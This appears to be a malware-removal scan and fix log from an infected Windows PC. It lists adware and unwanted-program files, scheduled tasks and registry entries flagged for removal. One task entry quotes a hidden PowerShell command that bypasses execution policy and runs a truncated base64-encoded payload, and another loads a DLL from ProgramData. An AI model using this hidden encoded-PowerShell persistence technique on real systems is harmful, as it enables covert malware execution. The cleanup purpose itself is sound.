2016-01-24 20:29 - 2016-03-03 07:51 - 00000000 ____D C:\Program Files (x86)\30464E43-1453696161-4B31-385A-C80AA9974D49
2016-01-24 20:29 - 2016-03-03 07:48 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\NUIns
2016-01-24 20:29 - 2016-01-24 20:29 - 00001888 _____ C:\Users\Pavilion\Desktop\Note-Up.lnk
2016-01-24 20:29 - 2016-01-24 20:29 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Note-UP
2016-01-24 20:29 - 2016-01-24 20:29 - 00000000 ____D C:\Program Files (x86)\Note-up
2016-01-24 20:28 - 2016-03-03 07:54 - 00000000 ____D C:\Program Files (x86)\YTDownloader
2016-01-24 20:28 - 2016-03-03 07:49 - 00000000 ____D C:\Program Files\Common Files\ShopperPro3
2016-01-24 20:28 - 2016-01-29 08:18 - 00000000 ____D C:\ProgramData\ShopperPro3
2016-01-24 20:28 - 2016-01-24 20:30 - 00000000 ____D C:\Users\Pavilion\AppData\Local\BrowserHelper
2016-01-24 20:28 - 2016-01-24 20:28 - 00004472 _____ C:\WINDOWS\System32\Tasks\ShopperPro3
2016-01-24 20:28 - 2016-01-24 20:28 - 00004024 _____ C:\WINDOWS\System32\Tasks\YTDownloaderUpd
2016-01-24 20:28 - 2016-01-24 20:28 - 00003696 _____ C:\WINDOWS\System32\Tasks\YTDownloader
2016-01-24 20:28 - 2016-01-24 20:28 - 00002018 _____ C:\Users\Pavilion\Desktop\YTDownloader.lnk
2016-01-24 20:28 - 2016-01-24 20:28 - 00000000 ____D C:\Users\Public\Documents\ShopperPro3
2016-01-24 20:28 - 2016-01-24 20:28 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
2016-01-24 20:27 - 2016-03-02 22:59 - 00000000 ____D C:\Program Files (x86)\ShopperPro3
2016-01-24 20:00 - 2016-02-18 12:24 - 00000025 _____ C:\WINDOWS\TEMPcoral.vbs
2016-01-24 20:00 - 2016-01-24 20:00 - 00000000 ____D C:\Program Files (x86)\dataup
2016-01-21 21:27 - 2016-01-21 21:34 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Free YouTube Downloader
2016-01-21 21:27 - 2016-01-21 21:27 - 14304128 _____ (HOW Inc. ) C:\Users\Pavilion\Downloads\FYTDSetup.exe
2016-01-21 21:27 - 2016-01-21 21:27 - 00001358 _____ C:\Users\Public\Desktop\Free YouTube Downloader.lnk
2016-01-21 21:27 - 2016-01-21 21:27 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\How Inc
2016-01-21 21:27 - 2016-01-21 21:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free YouTube Downloader
2016-01-21 21:27 - 2016-01-21 21:27 - 00000000 ____D C:\Program Files (x86)\Free YouTube Downloader
2015-12-17 16:08 - 2015-12-17 16:08 - 02560512 _____ (winpcoptimizerbetatwo) C:\WINDOWS\Allpcoptimizer.exe
2015-12-17 16:08 - 2015-12-17 16:08 - 00155136 _____ C:\WINDOWS\Allpcoptimizer.pdb
Consumer Input Update Helper (x32 Version: 1.3.25.309 - Compete Inc.) Hidden <==== ATTENTION
Task: {03A725AB-0ECF-466D-8CAE-26C04E4D8105} - System32\Tasks\DriverRestore_DailyScan => C:\Program Files (x86)\DriverRestore\DriverRestore.exe [2015-11-02] ()
Task: {06F04984-0015-4D8E-9367-FF3A492F3E2E} - System32\Tasks\RSPro => C:\Users\Pavilion\AppData\Local\SearchModule\dblaunch.exe <==== ATTENTION
Task: {0C38E4B8-7694-44BD-AFC0-1E9DE8919D2B} - System32\Tasks\Go_Palikan => C:\Users\Pavilion\AppData\Local\{745E4~1\UNINST~1.EXE
Task: {31B6914E-072A-49A8-AFF5-ED3D2A8E593D} - System32\Tasks\PasswordBoss_Desktop => C:\Program Files (x86)\PasswordBoss\PasswordBoss.exe [2016-02-12] ()
Task: {376C0BA5-E15F-4B40-A823-225C3FCABCD0} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {581639BA-40A3-44E9-BE3C-A203D4EF9822} - \SMW_UpdateTask_Time_333632333935313036312d5a4a6c414a34572a506c415a -> No File <==== ATTENTION
Task: {5BA1A598-F5B4-457B-B4DB-7E473F386859} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {68E532C5-F968-495A-8162-6190A59DDBC7} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: {72CC3C55-1058-4579-BA5F-6516C48AF6F8} - System32\Tasks\PBOnce => C:\Program Files (x86)\PasswordBoss\PasswordBoss.exe [2016-02-12] ()
Task: {7D177D35-FE6F-43A7-91C6-CF318ADE203F} - System32\Tasks\UpdateAdmin => C:\Users\Pavilion\AppData\Local\UpdateAdmin\UpdateAdmin.exe <==== ATTENTION
Task: {7EDCE97C-F1C1-4A41-95AC-E6464830CA80} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
Task: {7F47DD13-F279-45EE-9FD8-5A5567481719} - System32\Tasks\SMWUpd => C:\Program Files\Common Files\Goobzo\GBUpdate\updatehelper.exe <==== ATTENTION
Task: {81721D1D-ABB2-43B4-AC72-4565762C3479} - System32\Tasks\bvxvbxxvaa => C:\Users\Pavilion\AppData\Local\bvxvbxxvaa\bvxvbxxvaa.exe <==== ATTENTION
Task: {8ADB9F75-E245-4DBB-82B5-A8F1E41987A8} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
Task: {8D275CEB-D1C1-4B0E-9AF8-702B848053D9} - System32\Tasks\GFWRCXRFILHBOWQG => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {98557964-4BBF-41E8-9595-F8D2A8FBDF7D} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe <==== ATTENTION
Task: {99C02FA6-DBE5-4A50-A65A-A43D748DF35C} - System32\Tasks\{7E0C0947-797E-0F09-0911-780A780E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9400 more characters).
Task: {9C504D01-71CC-4E96-A021-5D844AF07B34} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION
Task: {A7935D2C-12ED-4545-B7C3-3B78417DA3F8} - System32\Tasks\Hicpadf => C:\Program Files\groover270120160530\Rahmolij.bat [2016-01-26] ()
Task: {A9976B6E-982E-4FE8-9D27-9BEC1EF1208B} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATTENTION
Task: {AA589749-7BA5-4EFD-BC80-54BD61B6F4D5} - \SPDriver -> No File <==== ATTENTION
Task: {AADF531D-03A3-4B54-96CE-A8C4E63996AC} - System32\Tasks\Ruoijfij => C:\Program Files\shopperz170220161305\Tutnitah.bat [2016-02-17] () <==== ATTENTION
Task: {B1348402-6939-49E1-BC47-BD109BFAA19F} - System32\Tasks\ProfessionalCleaningSoftware_Popup => C:\Program Files (x86)\Professional Cleaning Software\Splash.exe
Task: {B7863589-5326-4350-98D1-E8385CDF365E} - System32\Tasks\Ioagapi => C:\Program Files\shopperz260120162332\Amoypmai.bat [2016-01-26] () <==== ATTENTION
Task: {B9C9750E-CD41-402A-B195-32C86B6CBAA2} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe <==== ATTENTION
Task: {C92E166A-F6F2-4282-B5F7-60BF2BF6E0EE} - \SPBIW_UpdateTask_Time_333632333935313036312d5a4a6c414a34572a506c415a -> No File <==== ATTENTION
Task: {C9B0ADE5-64FA-45EE-93C4-E36E9724A933} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {CB72CB9C-27C2-411B-AC33-072F7BEC18B3} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {CCA6828D-1D7E-4B2C-BA38-E5B9B6F6C898} - System32\Tasks\{78F050FA-630C-8830-4A0C-DB36C4C6C07E} => /s /n /i:"/rt" "C:\PROGRA~3\a4d5839c\ddffd510.dll"
Task: {CE2D8226-EBEF-4733-A8D0-D49096E4873A} - System32\Tasks\OPJRVQSN1 => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
Task: {CECE72CC-000D-4EE0-9E55-E2DC813E5058} - System32\Tasks\DNSLAFAYETTE => C:\Program Files (x86)\DNS Unlocker\dnslafayette.exe <==== ATTENTION
Task: {D061F892-44CF-4566-B7C3-DC03AE8EDA12} - System32\Tasks\YPAYFOUHKEKEJOJX => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {E41E3983-FDFD-409D-B498-A4E5B4613E1A} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: {E9ADEB25-056D-4C84-BA2A-0F83C95055A3} - System32\Tasks\PanoramiShoc77 => C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elcycle.exe [2016-02-02] (ArcadeTwist)
Task: {FF3672CD-0761-41C6-BDDF-8B5F39FB7DD9} - System32\Tasks\ShopperPro3 => C:\Program Files (x86)\ShopperPro3\ShopperPro3.exe <==== ATTENTION
Task: {FFF15AF1-43A8-466F-B4A3-0A4DB0ECC63F} - System32\Tasks\JumpstaOf815 => C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elaccumulate.exe [2016-02-02] (ArcadeTwist)
Task: C:\WINDOWS\Tasks\Go_Palikan.job => 
Task: C:\WINDOWS\Tasks\JumpstaOf815.job => C:\Users\Pavilion\AppData\Local\ELASTI~1\Elaccumulate.exe
Task: C:\WINDOWS\Tasks\One System CarePeriod.job =>  <==== ATTENTION
Task: C:\WINDOWS\Tasks\OPJRVQSN1.job => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
C:\ProgramData\TomorrowGames
Task: C:\WINDOWS\Tasks\PanoramiShoc77.job => C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elcycle.exe
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => 
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\GFWRCXRFILHBOWQG.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
C:\Users\Pavilion\AppData\Local\JumpstThun357
C:\Program Files\shopperz170220161305
C:\Program Files (x86)\NowUSeeItPlayer
C:\Program Files (x86)\msrtn32
C:\Program Files (x86)\Note-up
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Temp\20160203
C:\Program Files (x86)\dataup
C:\Users\Pavilion\AppData\Local\ElastiMotio68
Task: C:\WINDOWS\Tasks\YPAYFOUHKEKEJOJX.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VOTPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VOTw8 => ""="Driver"
RemoveProxy:
EmptyTemp: